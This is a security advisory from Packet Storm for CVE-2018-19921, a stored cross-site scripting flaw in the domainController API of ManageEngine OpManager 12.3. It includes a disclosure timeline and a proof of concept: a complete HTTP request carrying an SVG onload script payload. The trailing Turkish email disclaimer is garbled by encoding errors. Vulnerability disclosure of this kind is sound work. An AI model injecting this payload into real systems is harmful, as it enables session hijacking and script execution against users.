Lucene search

K
packetstormMurat AydemirPACKETSTORM:150737
HistoryDec 11, 2018 - 12:00 a.m.

Zoho ManageEngine OpManager 12.3 Cross Site Scripting

2018-12-1100:00:00
Murat Aydemir
packetstormsecurity.com
52

EPSS

0.001

Percentile

51.0%

`I. VULNERABILITY  
-------------------------  
Zoho ManageEngine OpManager 12.3 before Build 123237 has XSS via the  
domainController API.  
  
II. CVE REFERENCE  
-------------------------  
CVE-2018-19921  
  
III. VENDOR  
-------------------------  
https://www.manageengine.com  
  
IV. TIMELINE  
-------------------------  
20/11/18 Vulnerability discovered  
20/11/18 Vendor contacted  
06/12/2018 OPManager replay that they fixed  
  
V. CREDIT  
-------------------------  
Murat Aydemir from Biznet Bilisim A.S.  
  
VI. DESCRIPTION  
-------------------------  
ManageEngine OPManager product(version 12.3) was vulnerable to stored  
xss attacks. A successfully exploit of this attack could allow thief  
users sessions or arbitrary interpret javascript code on remote host.  
References: https://www.manageengine.com/network-monitoring/help/read-me.html,  
https://bugbounty.zoho.com/bb/info#hof  
  
VII. PoC  
-------------------------  
POST /api/json/admin/updateDomainDetails?apiKey=5f5e26abc7bf2af2a5669cf258ec8385  
HTTP/1.1  
Host: vulnerablehost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0)  
Gecko/20100101 Firefox/61.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://vulnerablehost/apiclient/ember/index.jsp  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 113  
Cookie: JSESSIONID=XXXXXXXXXXXXXXXX; encryptPassForAutomaticSignin=  
XXXXXXXXXXXXXXXX; userNameForAutomaticSignin= XXXXXXXXXXXXXXXX;  
domainNameForAutomaticSignin=Authenticator; signInAutomatically=true;  
authrule_name=Authenticator; NFA__SSO= XXXXXXXXXXXXXXXX;  
opmcsrfcookie= XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX  
DNT: 1  
Connection: close  
  
domainName=AA%22%3E&domainController=aa%22%3E%3Csvg%2Fonload%3Dconfirm('xss_in_domainController_parameter')%2F%2F  
  
cleartext of payload "><svg/onload=alert('xss_in_domainController_parameter')//  
  
--   
  
  
  
  
  
  
  
  
  
Bu mesaj ve ekleri, mesajda   
gAPnderildiAi belirtilen   
kiAi/kiAilere APzeldir ve gizlidir. Bu mesaj   
herhangi bir amaASS iASSin   
ASSoAaltA+-lamaz, daAA+-tA+-lamaz ve yayA+-nlanamaz.   
MesajA+-n gAPnderildiAi kiAi   
deAilseniz, mesaj iASSeriAini ya da eklerini   
kopyalamayA+-nA+-z, yayA+-nlamayA+-nA+-z   
ya da baAka kiAilere yAPnlendirmeyiniz ve   
mesajA+- gAPnderen kiAiyi derhal   
uyararak bu mesajA+- siliniz. Airketimiz,   
mesajA+-n iASSeriAinin ve eklerinin   
size deAiAikliAe uArayarak veya geASS   
ulaAmasA+-ndan; gizliliAinin   
korunmamasA+-ndan; virA1/4s iASSermesinden ve   
bilgisayar sisteminize verebileceAi   
herhangi bir zarardan sorumlu   
deAildir  
  
  
This message and its   
attachments   
are confidential and intended solely for the recipient(s)   
stated therein.   
This message cannot be copied, distributed or published   
for any purpose.   
If you are not the intended recipient, please do not   
copy, publish or   
forward the information existing in the content and   
attachments of this   
message. In such case please notify the sender   
immediately and delete all   
the copies of the message. Our company shall   
have no liability for any   
changes in or late receiving of the message,   
loss of integrity and   
confidentiality, viruses and any damages caused in  
anyway to your computer   
system based on this message.  
  
`

EPSS

0.001

Percentile

51.0%

Related for PACKETSTORM:150737